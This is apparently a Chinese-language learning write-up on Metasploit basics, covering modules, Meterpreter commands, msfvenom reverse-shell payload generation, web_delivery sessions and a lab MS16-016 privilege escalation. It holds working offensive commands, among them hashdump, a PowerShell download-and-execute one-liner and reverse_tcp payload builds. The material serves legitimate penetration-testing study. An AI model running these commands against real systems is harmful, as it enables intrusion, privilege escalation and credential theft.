Metasploit基础
0x00:简介
Metasploit是一个漏洞利用框架,简称msf。是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
msf一般会有四种接口对外提供,分别为
- msfconsole
- msfcli
- msfgui
- msfweb
0x01:模块
- exploit
利用程序,针对漏洞、权限进行利用
- payload
用于在目标系统中运行任意命令或执行特定代码,主要用于shell获取
- auxiliary
该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块
- encoder
该模块主要针对exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测
0x03:基础命令
search mysql #查找
use exploit/multi/handler #使用
info #查看信息
show exploits/payloads/options #显示可用信息
exploit/run #执行
exploit -j #后台运行
back #返回上一级
sessions -i #查看当前可用会话
sessions -K #杀死所有活跃会话
getuid #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
sysinfo #列出受控主机的系统信息
getprivs #尽可能多地获取目标主机上的特权
getsystem #通过各种攻击向量来提升到系统用户权限
hashdump #导出目标主机中的口令哈希值
screenshot #对目标主机的屏幕进行截图
background #将当前Meterpreter shell转为后台运行
quit #关闭当前Meterpreter会话,返回MSF终端
ps #显示所有运行进程以及关联的用户账户
migrate PID #迁移到一个指定的进程PID
execute -f cmd.exe -i# 执行从cmd.exe命令进行交互
shell #以所有可用令牌来运行一个交互的shell
生成exe程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
生成php程序
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
反弹shell
exploit/multi/hander
- Msfvenom生成程序
- 使用handler执行exp
- 在目标机器运行Msfvenom生成程序
- 返回session
将刚才生成的shy.php上传至另外一台主机的Web目录,进行访问
发现一个session已经传过来了
这便是一个简单的反弹shell的操作,如果要连接上只需执行如下命令即可
sessions -i 1
使用background
命令使其回到后台运行
但是感觉连接的不是太稳定,容易出现超时状态。
exploit/multi/script/web_delivery
- 使用web_delivery返回脚本执行并加载exp
- 在目标机器运行脚本
- 返回session
先使用web_delivery
use exploit/multi/script/web_delivery
其次查看下信息
这里将targets设置为2,然后查找相应的payload进行设置
设置好之后,设置需要的参数
运行将下面的payload拿到目标机器中执行,反弹成功
这个方法相较于上一个稳定一点,这里就截一下目标机器的图片,测试一下
测试成功。
利用Metasploit提权
0x00:MS16-016漏洞简介
MS16-016(WebDAV特权提升漏洞),Microsoft Web分布式创作和版本管理(WebDAV)客户端验证输入不当,就会存在特权提升漏洞,成功利用此漏洞可以使用提升的特权执行任意代码
漏洞影响:
Windows Vista SP2
Windows Server 2008 x86 & x64
Windows Server 2008 R2 x64
Windows 7 x86 & x64
Windows 8.1 x86 & x64
环境准备:
win7 192.168.186.131
kail 192.168.186.134
还是先使用web_delivery
进行反弹shell
连接成功,查看当前用户
接下来利用powershell远程下载Sherlock脚本并进行检测
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns" >shy.txt
发现存在MS16-016漏洞,直接使用msf搜索看是否有这个漏洞的exp
使用一下,选择一下session
use exploit/windows/local/ms16_016_webdav
进行攻击,即可提权到system
总结
这次的学习简单的了解了Metasploit,以及相应的提权操作,继续学习,冲冲冲!